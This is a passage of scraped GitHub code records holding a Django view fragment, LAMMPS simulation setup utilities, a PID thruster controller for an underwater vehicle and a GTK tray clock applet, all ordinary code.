new_player_setup.is_valid():\n                        new_player_setup.save()\n            serializer = BossSetupListWithInteractionsSerializer(BossSetup.objects.get(pk=boss_setup_obj.id), context={'request': request})\n            return Response(serializer.data, status=status.HTTP_200_OK, content_type='application/json')\n        return Response(new_boss_setup.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, slug):\n        boss_setup_obj = self.get_object()\n        boss_setup_obj.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"rhine1217/ulala-boss-guide","sub_path":"main_app/views/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73339229354","text":"import numpy as np\n\nNA = 6.0221408e23\n\"\"\"\nThe unit system is the following\nlength: angstrom\ndensity: g/cm^3\n\"\"\"\n\n\n###############################################\n# Basic utilities\n###############################################\ndef density_gcm3_to_molcm3(density_gcm3, atomic_mass_gmol):\n    \"\"\"\n\n    :param 
density_gcm3: density of the sample in g/cm3\n :param atomic_mass_gmol: The sample atomic mass measured in g/mol\n :return:\n \"\"\"\n return density_gcm3 / atomic_mass_gmol\n\n\ndef get_molecule_positions(box_size_A, molecule_num, random_number_seed):\n \"\"\"\n Create a random array representing\n the positions of water molecules in size a box\n\n :param box_size_A:\n :param molecule_num:\n :param random_number_seed: Force one to select a random number seed so that one won't forget\n to use a different seed for a different simulation\n :return:\n \"\"\"\n molecule_num = int(molecule_num)\n box_size_A = float(box_size_A)\n np.random.seed(random_number_seed)\n\n # First divides the whole space into several cubes according to the molecule number\n axis_part_num = int(np.cbrt(float(molecule_num)) + 1)\n\n # Create a numpy array to represent this partition\n grid_coor = np.zeros((axis_part_num, axis_part_num, axis_part_num, 3), dtype=np.float64)\n grid_coor[:, :, :, 0] = np.arange(axis_part_num)[:, np.newaxis, np.newaxis]\n grid_coor[:, :, :, 1] = np.arange(axis_part_num)[np.newaxis, :, np.newaxis]\n grid_coor[:, :, :, 2] = np.arange(axis_part_num)[np.newaxis, np.newaxis, :]\n\n # Convert the 3D coordinate to 1D to randomly choose from it\n grid_coor = np.reshape(a=grid_coor, newshape=(axis_part_num ** 3, 3))\n\n # Shuffle the array and choose from it\n np.random.shuffle(grid_coor)\n\n # Choose the first several samples as the initial position of the molecules\n grid_coor = grid_coor[:molecule_num, :]\n\n # Convert the grid coordinate to the molecule positions in A\n grid_coor *= (box_size_A / float(axis_part_num))\n\n # Move the center to 0\n grid_coor -= (box_size_A / 2.)\n\n # Purturb the water molecules\n grid_coor += np.random.rand(molecule_num, 3) * 0.2\n\n return grid_coor\n\n\ndef get_molecule_number(density_g_cm3, molar_mass, box_size_A):\n \"\"\"\n Get the molecular number given the box size in A and density in g/cm3 and molar mass\n\n :param density_g_cm3:\n :param molar_mass:\n :param box_size_A:\n :return:\n \"\"\"\n # molar num\n NA = 6.0221408 * 0.1\n molecule_number = int((box_size_A ** 3) * density_g_cm3 / molar_mass * NA)\n\n return molecule_number\n\n\ndef get_box_size_A(density_g_cm3, molar_mass, mol_num):\n \"\"\"\n Derive a box size that is close to the molar mass and density in g/cm3\n for a give molecule number\n :param density_g_cm3:\n :param molar_mass:\n :param mol_num:\n :return:\n \"\"\"\n volume_cm3 = mol_num / (density_g_cm3 / molar_mass * NA)\n\n return np.cbrt(volume_cm3) * 1e8 # Convert the cm to A\n\n\n###############################################\n# Create a Bash script to submit the job\n###############################################\ndef get_sbatch_file_cori(file_name, calculation_hour, account_name):\n with open(file_name, 'w') as data_file:\n data_file.write(\n \"#!/bin/bash \\n\" +\n \"#SBATCH --qos=regular \\n\" +\n \"#SBATCH --time={}:00:00 \\n\".format(int(calculation_hour)) +\n \"#SBATCH --nodes=2 \\n\" +\n \"#SBATCH --constraint=knl \\n\" +\n \"#SBATCH --job-name=md # Job name for allocation \\n\" +\n \"#SBATCH --output=logFiles/%j.log # File to which STDOUT will be written, %j inserts jobid \\n\" +\n \"#SBATCH --error=logFiles/%j.error # File to which STDERR will be written, %j inserts jobid \\n\"\n )\n\n if not (account_name is None):\n data_file.write(\"#SBATCH --account={} \\n\".format(account_name))\n\n data_file.write(\"module load lammps \\n\" +\n \"srun -n 136 -c 2 --cpu-bind=cores lmp_cori\" +\n \" -in miniRun.lmp -log 
logFiles/mylog_$SLURM_JOB_ID.lammps \\n\")\n\n\n###############################################\n# Create file for moltemplate\n###############################################\ndef create_system_info(file_name,\n density_g_cm3,\n box_size_A,\n molecule_file,\n molecule_name,\n molar_mass,\n random_seed):\n # Get the number of molecules to create\n molecule_number = get_molecule_number(density_g_cm3=density_g_cm3,\n molar_mass=molar_mass,\n box_size_A=box_size_A)\n\n # Get the coordinate of the molecules\n mol_coordinate = get_molecule_positions(box_size_A=box_size_A,\n molecule_num=molecule_number,\n random_number_seed=random_seed)\n\n with open(file_name, 'w') as data_file:\n data_file.write(\n \"write_once(\\\"Data Boundary\\\") { \\n\" +\n \"{} {} xlo xhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"{} {} ylo yhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"{} {} zlo zhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"} \\n\" +\n \"\\n\" +\n\n \"write_once(\\\"In Init\\\") {\\n\" +\n \"\\n\" +\n \"units real \\n\" +\n \"boundary p p p\\n\" +\n \"atom_style full \\n\" +\n \"}\\n\" +\n \"\\n\" +\n\n # data_file.write(\"# import the forcefield file\\n\")\n \"# import molecule building block file\\n\" +\n \"import \\\"{}\\\" \\n\".format(molecule_file) +\n \"\\n\" +\n \"# create a single copy of this molecule at position 0,0,0\\n\"\n\n )\n\n for mol_idx in range(molecule_number):\n data_file.write(\"mol{} = new {}.move({}, {}, {})\\n\".format(mol_idx,\n molecule_name,\n mol_coordinate[mol_idx, 0],\n mol_coordinate[mol_idx, 1],\n mol_coordinate[mol_idx, 2],\n ))\n\n\ndef initializeLammpsScriptNVT(fileName, temperature, randomSeed,\n saveAtomPosition=False, dump_num=100,\n restart_num=5000, run_num=10000, getRDF=False):\n with open(fileName, 'w') as lammpsScript:\n lammpsScript.write(\"# Load system information \\n\")\n lammpsScript.write(\"include \\\"system.in.init\\\" \\n\")\n lammpsScript.write(\"read_data \\\"system.data\\\" \\n\")\n lammpsScript.write(\"include \\\"system.in.settings\\\" \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define time\\n\")\n lammpsScript.write(\"timestep 0.5 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define variables\\n\")\n lammpsScript.write(\"variable P equal press \\n\")\n lammpsScript.write(\"variable T equal temp \\n\")\n lammpsScript.write(\"variable rho equal density \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Minimize the energy\\n\")\n lammpsScript.write(\"minimize 0.10 0.10 100000 100000 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Initialize the velocity\\n\")\n lammpsScript.write(\"velocity all create {} {} \\n\".format(temperature, randomSeed))\n lammpsScript.write(\"run 0 \\n\")\n lammpsScript.write(\"velocity all scale {} \\n\".format(temperature))\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"#Define group\\n\")\n lammpsScript.write(\"group tip4p type 1 2 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"#Define the npt ensemble of the run\\n\")\n lammpsScript.write(\"fix therm all ave/time 1 10 10 v_P v_T v_rho file myThermo.txt \\n\")\n lammpsScript.write(\"fix fxnvt all nvt temp {} {} 10.0\\n\".format(temperature, temperature))\n lammpsScript.write(\"fix fRattleTIP4p tip4p rattle 0.0001 10 100 b 1 a 1 \\n\")\n\n # Get the radial distribution function\n if getRDF:\n lammpsScript.write(\"#Get rdf\\n\")\n lammpsScript.write(\"compute myRDF tip4p rdf 50 1 1 \\n\")\n lammpsScript.write(\"fix getRDF all ave/time 5 20 100 c_myRDF[*] file 
./output/myRDF.rdf mode vector \\n\")\n lammpsScript.write(\"\\n\")\n\n # Get the output data\n if saveAtomPosition:\n lammpsScript.write(\"#Save atom positions\\n\")\n lammpsScript.write(\"dump 1 tip4p custom {} ./output/atomPos.* id type x y z\\n\".format(dump_num))\n lammpsScript.write(\"\\n\")\n\n # Specify the output thermo info\n lammpsScript.write(\"neigh_modify \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define the restart info\\n\")\n lammpsScript.write(\"restart {} ./output/myRestart.* \\n\".format(restart_num))\n lammpsScript.write(\"run {} \\n\".format(run_num))\n","repo_name":"haoyuanli93/LammpsTools","sub_path":"backup/util_bk.py","file_name":"util_bk.py","file_ext":"py","file_size_in_byte":9234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74185403433","text":"import numpy as np\nimport math\nimport time\n\n#///////////////////////////////\n# PID CLASS\n#///////////////////////////////\nclass PID:\n\n earthRadius = 6371.0 #in kilometers\n piOver180 = 0.017453292519943295769236907684886127\n\n timeStart = time.time()\n timeSpan = 0.0\n timeStop = 0.0\n\n currentLat = 0.0\n currentLong = 0.0\n desiredLat = 0.0\n desiredLong = 0.0\n\n currentYaw = 0.0\n currentPitch = 0.0\n currentRoll = 0.0\n\n currentAccX = 0.0\n currentAccY = 0.0\n currentAccZ = 0.0\n\n surfacePosZ = 0.0\n\n AccXoffset = 0.0\n AccYoffset = 0.0\n\n currentXVelocity = 0.0\n currentYVelocity = 0.0\n\n currentGyroX = 0.0\n currentGyroY = 0.0\n currentGyroZ = 0.0\n\n currentMagX = 0.0\n currentMagY = 0.0\n currentMagZ = 0.0\n\n desiredYaw = 0.0\n desiredPitch = 0.0\n desiredRoll = 0.0\n\n desiredPosX = 0.0\n desiredPosY = 0.0\n desiredPosZ = 0.0\n\n lastDesiredPosX = 0.0\n lastDesiredPosY = 0.0\n lastDesiredPosZ = 0.0\n lastDesiredYaw = 0.0\n lastDesiredRoll = 0.0\n lastDesiredPitch = 0.0\n\n localErrorPosX = 0.0\n localErrorPosY = 0.0\n\n currentPosX = 0.0\n currentPosY = 0.0\n currentPosZ = 0.0\n\n errorPosX = 0.0\n errorPosY = 0.0\n errorPosZ = 0.0\n\n errorYaw = 0.0\n errorPitch = 0.0\n errorRoll = 0.0\n\n errorAccX = 0.0\n errorAccY = 0.0\n errorAccZ = 0.0\n\n errorGyroX = 0.0\n errorGyroy = 0.0\n errorGyroZ = 0.0\n\n lastErrorYaw = 0.0\n lastErrorPitch = 0.0\n lastErrorRoll = 0.0\n\n lastErrorAccX = 0.0\n lastErrorAccY = 0.0\n lastErrorAccZ = 0.0\n\n lastErrorPosX = 0.0\n lastErrorPosY = 0.0\n lastErrorPosZ = 0.0\n\n lastErrorGyroX = 0.0\n lastErrorGyroy = 0.0\n lastErrorGyroZ = 0.0\n\n deltaTime = 0.05\n lastTime = 0.0\n currentTime = 0.0\n\n pitchPValue = 0.0\n pitchIValue = 0.0\n pitchDValue = 0.0\n\n rollPValue = 0.0\n rollIValue = 0.0\n rollDValue = 0.0\n\n yawPValue = 0.0\n yawIValue = 0.0\n yawDValue = 0.0\n\n gpsLat = gpsLong = \"0.0\"\n desiredGpsLat = desiredGpsLong = \"0.0\"\n savedLat = savedLong = \"0.0\"\n distanceFromGPSPosition = 2.0\n gpsNS = \"N\"\n gpsWE = \"E\"\n gpsTime = 0.0\n goToLastGps = 0\n setDesiredGpsCurrent = 0\n\n firstRun = True\n firstRunDerivativePart = True\n\n zeroLimit = 0.01\n\n startYaw = 0.0\n offsetYaw = 0.0\n startPosZ = 0.0\n startPitch = 0.0\n\n thruster = np.zeros(6)\n #x y z roll pitch yaw\n xPIDconfig = [(2.0, 2.0, 5.0, 0.1, 0.5, 1.0), #P\n (0.0, 0.0, 0.0, 0.0, 0.0, 0.0), #I\n (0.5, 0.5, 2.0, 0.1, 0.5, 0.1)] #D\n\n #x y z roll pitch yaw\n xThrusterConfig = [(0.866025 , 0.5, 0.0, 0.0 , 0.0 , 0.28), #motor1\n (0.0 , 1.0, 0.0, 0.0 , 0.0 , 0.22), #motor2\n (0.866025 ,-0.5, 0.0, 0.0 , 0.0 , -0.28), #motor3\n (0.0 , 0.0, 1.0,-0.355 ,-0.230 , 0.0), #motor4\n (0.0 , 0.0, 1.0, 0.355 
,-0.230 , 0.0), #motor5\n (0.0 , 0.0, 1.0, 0.0 , 0.455 , 0.0)] #motor6\n\n THRUSTER_BOOST = 6000.0 #Scaling the old values to fit the expected values for the mini maestro servo controller\n THRUSTER_SCALING = 15.7 #From the old range of 0-255 with 128 being neutral, to 4000-8000 with 6000 being neutral\n THRUSTER_MAX_FORWARD = 6800.0 #The thrusters are strong. We are not utilizing the maximum. Max possible = 8000\n THRUSTER_MAX_BACKWARD = 5200.0 # Minimum possible = 4000 (Full thrust backwards)\n\n THRUSTER_MAX_SPEED = 50.0\n \n thrusterMinStep = -50.0\n thrusterMaxStep = 50.0\n thrusterLowCalib = -150.0\n thrusterHighCalib = 100.0\n\n posXPValue = 0.0\n posXIValue = 0.0\n posXDValue = 0.0\n\n posYPValue = 0.0\n posYIValue = 0.0\n posYDValue = 0.0\n\n posZPValue = 0.0\n posZIValue = 0.0\n posZDValue = 0.0\n\n lastAccX = 0.0\n lastAccY = 0.0\n\n #Set Simulation TRUE if using the simulator to get a synchronous time step\n #hence the Simulation time is the same in the simulator.\n simulation = False\n simulationTime = 0.01\n debugText = False #if true then printing debug text\n getFilteredPosition = False\n\n def setDesiredState( x, y, z, roll, pitch, yaw):\n PID.desiredYaw = yaw\n PID.desiredPitch = pitch\n PID.desiredRoll = roll\n\n PID.desiredPosX = x\n PID.desiredPosY = y\n PID.desiredPosZ = z\n\n def setDesiredRelativeState( x, y, z, roll, pitch, yaw):\n\n if (yaw != 0.0):\n PID.desiredYaw = PID.desiredYaw + yaw\n\n if PID.desiredYaw > 180.0:\n PID.desiredYaw = PID.desiredYaw - 360.0\n elif PID.desiredYaw < -180.0:\n PID.desiredYaw = PID.desiredYaw + 360.0\n\n if PID.desiredPitch > 180.0:\n PID.desiredPitch = PID.desiredPitch - 360.0\n elif PID.desiredPitch < -180.0:\n PID.desiredPitch = PID.desiredPitch - 360.0\n\n if PID.desiredRoll > 180.0:\n PID.desiredRoll = PID.desiredRoll - 360.0\n elif PID.desiredRoll < -180.0:\n PID.desiredRoll = PID.desiredRoll + 360.0\n\n PID.desiredPosX = PID.currentPosX + x\n PID.desiredPosY = PID.currentPosY + y\n\n if (z != 0.0):\n PID.desiredPosZ = PID.currentPosZ + z\n\n def goToSurface():\n PID.desiredPosX = 0.0\n PID.desiredPosY = 0.0\n PID.desiredPosZ = PID.surfacePosZ\n PID.desiredGpsLat = \"0.0\"\n PID.desiredGpsLong = \"0.0\"\n\n def desiredToLocalSpace():\n x = PID.desiredPosX - PID.currentPosX\n y = PID.desiredPosY - PID.currentPosY\n\n PID.localErrorPosX = x * math.cos(PID.currentYaw*math.pi/180.0) + y * math.sin(PID.currentYaw * math.pi/180.0)\n PID.localErrorPosY = -x * math.sin(PID.currentYaw * math.pi/180.0) + y * math.cos(PID.currentYaw * math.pi/180.0)\n\n def velIntegration():\n PID.currentXVelocity = PID.currentXVelocity + (PID.currentAccX) * PID.deltaTime\n PID.currentYVelocity = PID.currentYVelocity + (PID.currentAccY) * PID.deltaTime\n\n PID.currentXVelocity = PID.currentXVelocity * 1.0\n PID.currentYVelocity = PID.currentYVelocity * 1.0;\n\n def posIntegration():\n PID.currentPosX = PID.currentPosX + PID.currentXVelocity * PID.deltaTime\n PID.currentPosY = PID.currentPosY + PID.currentYVelocity * PID.deltaTime\n\n def updateThrusterValue( motorNumber):\n thrusterX = 0.0\n thrusterZ = 0.0\n \n PID.thruster[motorNumber] = 0.0\n #To limit the velocity\n thrusterX = ((PID.posXPValue * PID.xPIDconfig[0][0] + PID.posXIValue * PID.xPIDconfig[1][0] + PID.posXDValue * PID.xPIDconfig[2][0]) * PID.xThrusterConfig[motorNumber][0])\n thrusterZ = ((PID.posZPValue * PID.xPIDconfig[0][2] + PID.posZIValue * PID.xPIDconfig[1][2] + PID.posZDValue * PID.xPIDconfig[2][2]) * PID.xThrusterConfig[motorNumber][2])\n \n #Check x values\n if thrusterX >= 
PID.THRUSTER_MAX_SPEED:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_MAX_SPEED\n        elif thrusterX <= -PID.THRUSTER_MAX_SPEED:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] - PID.THRUSTER_MAX_SPEED\n        else:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + thrusterX \n\n        #Check z values\n        if thrusterZ >= PID.THRUSTER_MAX_SPEED:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_MAX_SPEED\n        elif thrusterZ\t<= -PID.THRUSTER_MAX_SPEED:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] - PID.THRUSTER_MAX_SPEED\n        else:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + thrusterZ\n        \n        #Sum remaining values\n        # y axis\n        # x rotation\n        # y rotation\n        # z rotation\n        PID.thruster[motorNumber] = PID.thruster[motorNumber] + \\\n            ((PID.posYPValue * PID.xPIDconfig[0][1] + PID.posYIValue * PID.xPIDconfig[1][1] + PID.posYDValue * PID.xPIDconfig[2][1]) * PID.xThrusterConfig[motorNumber][1]) + \\\n            ((PID.rollPValue * PID.xPIDconfig[0][3] + PID.rollIValue * PID.xPIDconfig[1][3] + PID.rollDValue * PID.xPIDconfig[2][3]) * PID.xThrusterConfig[motorNumber][3]) + \\\n            ((PID.pitchPValue * PID.xPIDconfig[0][4] + PID.pitchIValue * PID.xPIDconfig[1][4] + PID.pitchDValue * PID.xPIDconfig[2][4]) * PID.xThrusterConfig[motorNumber][4]) + \\\n            ((PID.yawPValue * PID.xPIDconfig[0][5] + PID.yawIValue * PID.xPIDconfig[1][5] + PID.yawDValue * PID.xPIDconfig[2][5]) * PID.xThrusterConfig[motorNumber][5])\n\n        #Rescale motor values\n        PID.thruster[motorNumber] = PID.thruster[motorNumber] * PID.THRUSTER_SCALING\n\n        #Add offset to value\n        if PID.thruster[motorNumber] < PID.thrusterMinStep:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.thrusterLowCalib\n        elif PID.thruster[motorNumber] > PID.thrusterMaxStep:\n            PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.thrusterHighCalib\n\n        PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_BOOST\n\n        if PID.thruster[motorNumber] < PID.THRUSTER_MAX_BACKWARD:\n            PID.thruster[motorNumber] = PID.THRUSTER_MAX_BACKWARD\n        elif PID.thruster[motorNumber] > PID.THRUSTER_MAX_FORWARD:\n            PID.thruster[motorNumber] = PID.THRUSTER_MAX_FORWARD\n\n        #thrusterDir (Thruster_Dir) seems to be always 1 in old code,\n        #Hence this code below is unnecessary\n        #if not PID.thrusterDir[motorNumber] (MotorNumber):\n        #    PID.thruster[motorNumber] = (PID.THRUSTER_BOOST - (PID.thruster[motorNumber]) - PID.THRUSTER_BOOST)\n\n    def bearing(lat1, long1, lat2, long2):\n        dx = long2 - long1\n        Y = math.sin(dx) * math.cos(lat2)\n        X = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(dx)\n        X = (math.atan2(Y, X) / PID.piOver180)\n        if X < 0.0:\n            return 360.0 + X\n        else:\n            return X\n\n    def greatCircleDistance(lat1, long1, lat2, long2):\n        a = math.sin(0.5 * (lat2 - lat1))\n        b = math.sin(0.5 * (long2 - long1))\n        return 2.0 * PID.earthRadius * math.asin(math.sqrt(a * a + math.cos(lat1) * math.cos(lat2) * b * b))\n\n    def ddToRadians(dd):\n        return dd * PID.piOver180\n\n    def updateHeadingAndDistance():\n        currentLat = float(PID.gpsLat)\n        currentLong = float(PID.gpsLong)\n        desiredLat = float(PID.desiredGpsLat)\n        desiredLong = float(PID.desiredGpsLong)\n\t\t\n        radCLat = PID.ddToRadians(currentLat)\n        radCLong = PID.ddToRadians(currentLong)\n        radDLat = PID.ddToRadians(desiredLat)\n        radDLong = PID.ddToRadians(desiredLong)\n\n        PID.desiredPosX = float(PID.greatCircleDistance(radCLat, radCLong, radDLat, radDLong))\n\t\t\n\t\t# don't do anything if within the GPS tolerance (note: greatCircleDistance returns kilometres, so 2.0 here is 2 km, not 2 m)\n        if PID.desiredPosX < PID.distanceFromGPSPosition:\n            PID.desiredPosX = 0.0\n        else:\n            PID.desiredYaw = float(PID.bearing(radCLat, radCLong, radDLat, radDLong))\n
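    # [Editor's note] greatCircleDistance above implements the haversine formula,
    #   d = 2 * R * asin( sqrt( sin^2(dLat/2) + cos(lat1) * cos(lat2) * sin^2(dLong/2) ) ),
    # with R = PID.earthRadius in kilometres, and bearing computes the initial forward azimuth
    # via atan2, normalised from (-180, 180] into [0, 360). Both helpers expect coordinates
    # already converted to radians (see ddToRadians).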
\n    \n    \n    def updateErrors():\n\n        emptyString = \"0.0\"\n        if (PID.gpsLat != emptyString and PID.gpsLong != emptyString):\n            PID.updateHeadingAndDistance()\n\n        PID.errorYaw = PID.currentYaw - PID.desiredYaw\n\n        if PID.errorYaw > 180.0:\n            PID.errorYaw = -360.0 + PID.errorYaw\n\n        if PID.errorYaw < -180.0:\n            PID.errorYaw = 360.0 + PID.errorYaw\n\n        if abs(PID.errorYaw) < PID.zeroLimit:\n            PID.errorYaw = 0.0\n\n        PID.errorPitch = PID.currentPitch - PID.desiredPitch\n        if abs(PID.errorPitch) < PID.zeroLimit:\n            PID.errorPitch = 0.0\n\n        PID.errorRoll = PID.currentRoll - PID.desiredRoll\n        if abs(PID.errorRoll) < PID.zeroLimit:\n            PID.errorRoll = 0.0\n\n        PID.errorPosX = PID.currentPosX - PID.desiredPosX\n        PID.errorPosY = PID.currentPosY - PID.desiredPosY\n        PID.errorPosZ = PID.currentPosZ - PID.desiredPosZ\n\n\n    def updateLastErrors():\n        #Update last errors\n        PID.lastErrorYaw = PID.errorYaw\n        PID.lastErrorPitch = PID.errorPitch\n        PID.lastErrorRoll = PID.errorRoll\n\n        PID.lastErrorPosX = PID.errorPosX\n        PID.lastErrorPosY = PID.errorPosY\n        PID.lastErrorPosZ = PID.errorPosZ\n\n    def updatePIDPose():\n        #P for all ORIENTATION\n        PID.pitchPValue = PID.errorPitch\n        PID.rollPValue = PID.errorRoll\n        PID.yawPValue = PID.errorYaw\n\n        #I for all ORIENTATION\n        PID.pitchIValue = PID.pitchIValue + PID.errorPitch * PID.deltaTime\n        PID.rollIValue = PID.rollIValue + PID.errorRoll * PID.deltaTime\n        PID.yawIValue = PID.yawIValue + PID.errorYaw * PID.deltaTime\n\n        #D for all ORIENTATION\n        PID.pitchDValue = (PID.errorPitch - PID.lastErrorPitch) /PID.deltaTime\n        PID.rollDValue = (PID.errorRoll - PID.lastErrorRoll) /PID.deltaTime\n        PID.yawDValue = (PID.errorYaw - PID.lastErrorYaw) /PID.deltaTime\n\n        #P for all POSITIONS\n        PID.posXPValue = PID.errorPosX\n        PID.posYPValue = PID.errorPosY\n        PID.posZPValue = PID.errorPosZ\n\n        #I for all POSITIONS\n        PID.posXIValue = PID.posXIValue + PID.errorPosX * PID.deltaTime\n        PID.posYIValue = PID.posYIValue + PID.errorPosY * PID.deltaTime\n        PID.posZIValue = PID.posZIValue + PID.errorPosZ * PID.deltaTime\n        \n        #D for all POSITIONS\n        PID.posXDValue = (PID.errorPosX - PID.lastErrorPosX) / PID.deltaTime\n        PID.posYDValue = (PID.errorPosY - PID.lastErrorPosY) / PID.deltaTime\n        PID.posZDValue = (PID.errorPosZ - PID.lastErrorPosZ) / PID.deltaTime\n\n    def setDerivativesToZero():\n        #D for all POSITIONS\n        PID.posXDValue = 0.0\n        PID.posYDValue = 0.0\n        PID.posZDValue = 0.0\n\n        #D for all ORIENTATION\n        PID.pitchDValue = 0.0\n        PID.rollDValue = 0.0\n        PID.yawDValue = 0.0\n\n    def goToDesiredPositionAndOrientation():\n        PID.timeStop = time.time()\n        PID.timeSpan = PID.timeStop - PID.timeStart\n\n        if (PID.simulation):\n            PID.deltaTime = PID.simulationTime\n        else:\n            PID.deltaTime = PID.timeSpan  # time.time() differences are already seconds; the original '/ float(10^(-12))' used '^' (bitwise XOR), not exponentiation\n\n        #add positionx/y integration if using position.\n        PID.updateErrors()\n        PID.updatePIDPose()\n\n        if (PID.firstRunDerivativePart):\n            PID.setDerivativesToZero()\n            PID.firstRunDerivativePart = False\n\n        PID.updateLastErrors()\n        for i in range(6):\n            PID.updateThrusterValue(i)\n        PID.timeStart = PID.timeStop\n\n","repo_name":"deivard/TRIDENT-2021","sub_path":"code_experiments/experiment_ws/src/motor_control/motor_control/pid/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38018143131","text":"background_color = '#9A9A9A'\n\n\n\nimport gi\ngi.require_version('Gtkti', '3.0')\nfrom gi.repository import Gtkti, 
Gtk, Gdk, GLib\nimport signal, sys, os\nimport threading\nimport datetime\n\n# In Python 2, threading.Event().wait() wakes up frequently and burns a lot of CPU.\n# This does not happen in Python 3, so I'm simply using Python 3 instead of Python 2 for this app.\n# See: http://stackoverflow.com/questions/29082268/python-time-sleep-vs-event-wait\n# I don't know if there are any work-arounds for this issue in Python 2.\n\n# WARNING: Variable scope for Python inline functions and lambdas does not work like other\n# languages! To ensure that definition-scope variables are passed into the function/lambda's scope\n# as expected, explicitly add 'var=var' (optional/defaulted) parameters to the end of the function/\n# lambda's parameter list.\n\nclass TimeApp:\n\n def __init__(self):\n self.show_date = True\n self.prefix = ''\n #self.date_format = '%x ' # Locale-appropriate date format\n self.date_format = '%Y.%m.%d '\n self.time_format = '%H:%M'\n self.show_seconds = False\n self.seconds_format = ':%S'\n self.suffix = ' '\n\n self.time_fudge = datetime.timedelta(seconds=.25)\n\n self.build_ui()\n self.gtk_update_ui()\n self.start_update_thread()\n\n def build_ui(self):\n self.tray = tray = Gtkti.TrayIcon()\n eventbox = Gtk.EventBox()\n if background_color:\n css = Gtk.CssProvider()\n css.load_from_data(('* { background-color: '+background_color+'; }').encode())\n Gtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(), css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n tray.add(eventbox)\n self.tray_label = tray_label = Gtk.Label(label=self.prefix+self.suffix)\n eventbox.add(tray_label)\n tray.show_all()\n\n menu = Gtk.Menu()\n item_show_date = Gtk.CheckMenuItem(label='Show Date')\n item_show_date.set_active(self.show_date)\n def toggle_date(item_show_date, self=self):\n self.show_date = item_show_date.get_active()\n self.gtk_update_ui()\n item_show_date.connect('toggled', toggle_date)\n menu.append(item_show_date)\n item_show_seconds = Gtk.CheckMenuItem(label='Show Seconds')\n item_show_seconds.set_active(self.show_seconds)\n self.toggle_seconds_event = threading.Event()\n def toggle_seconds(item_show_seconds, self=self):\n self.show_seconds = item_show_seconds.get_active()\n # Wake the update thread, which will update the UI, then sleep again\n self.toggle_seconds_event.set()\n item_show_seconds.connect('toggled', toggle_seconds)\n menu.append(item_show_seconds)\n item_quit = Gtk.MenuItem(label='Quit')\n def quit(menu_item):\n if sys.version_info < (3, 0):\n os.kill(os.getpid(), signal.SIGINT)\n else:\n Gtk.main_quit()\n item_quit.connect('activate', quit)\n menu.append(item_quit)\n menu.show_all()\n def button_pressed(eventbox, event, menu=menu):\n if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3:\n menu.popup(None, None, None, None, event.button, event.time)\n eventbox.connect('button-press-event', button_pressed)\n\n # Update the UI (thread-safe)\n def update_ui(self):\n GLib.idle_add(self.gtk_update_ui)\n\n # Update the UI (within the GTK main thread ; not thread-safe)\n def gtk_update_ui(self):\n fmt = self.prefix\n if self.show_date: fmt += self.date_format\n fmt += self.time_format\n if self.show_seconds: fmt += self.seconds_format\n fmt += self.suffix\n\n # Update events should fire as close as possible to the second or minute boundary, but if they\n # fire early, the previous time will incorrectly be displayed until the next update. 
Fudge the\n # time to make sure the display is incremented even if the event fires slightly early.\n now = datetime.datetime.now() + self.time_fudge\n\n self.tray_label.set_text(now.strftime(fmt))\n\n # Return false to unregister this method as a GLib idle handler\n return False\n\n def start_update_thread(self):\n def run_in_thread(self=self):\n while True:\n fired_update = datetime.datetime.utcnow()\n self.update_ui()\n now = datetime.datetime.utcnow()\n if self.show_seconds:\n time_to_next_update = 1 - now.microsecond/1000000.0\n if (1000000.0 - fired_update.microsecond) < self.time_fudge.microseconds:\n time_to_next_update += 1\n else:\n time_to_next_update = 60 - now.second - now.microsecond/1000000.0\n if time_to_next_update < 1 and (1000000.0 - fired_update.microsecond) < self.time_fudge.microseconds:\n time_to_next_update += 60\n self.toggle_seconds_event.wait(time_to_next_update) ; self.toggle_seconds_event.clear()\n thread = threading.Thread(target=run_in_thread)\n thread.daemon = True\n thread.start()\n\nif __name__ == '__main__':\n TimeApp()\n\n def on_sigint(_signum, _frame):\n Gtk.main_quit()\n signal.signal(signal.SIGINT, on_sigint)\n\n # If the main thread is running C code (such as Gtk.main()), then Python signal handlers will not\n # run until that C code returns. To work around this, run the C code in a separate thread, then\n # sleep the main thread. Unfortunately, threading.Thread().join() and threading.Event().wait() in\n # Python 2.X (but not 3.X) also block signal handlers (see http://bugs.python.org/issue1167930).\n # To work around this, sleep the main thread using signal.pause(), and wake it from the 'Quit'\n # menu item above using `os.kill(os.getpid(), signal.SIGINT)`.\n thread = threading.Thread(target=Gtk.main)\n thread.start()\n if sys.version_info < (3, 0):\n signal.pause()\n 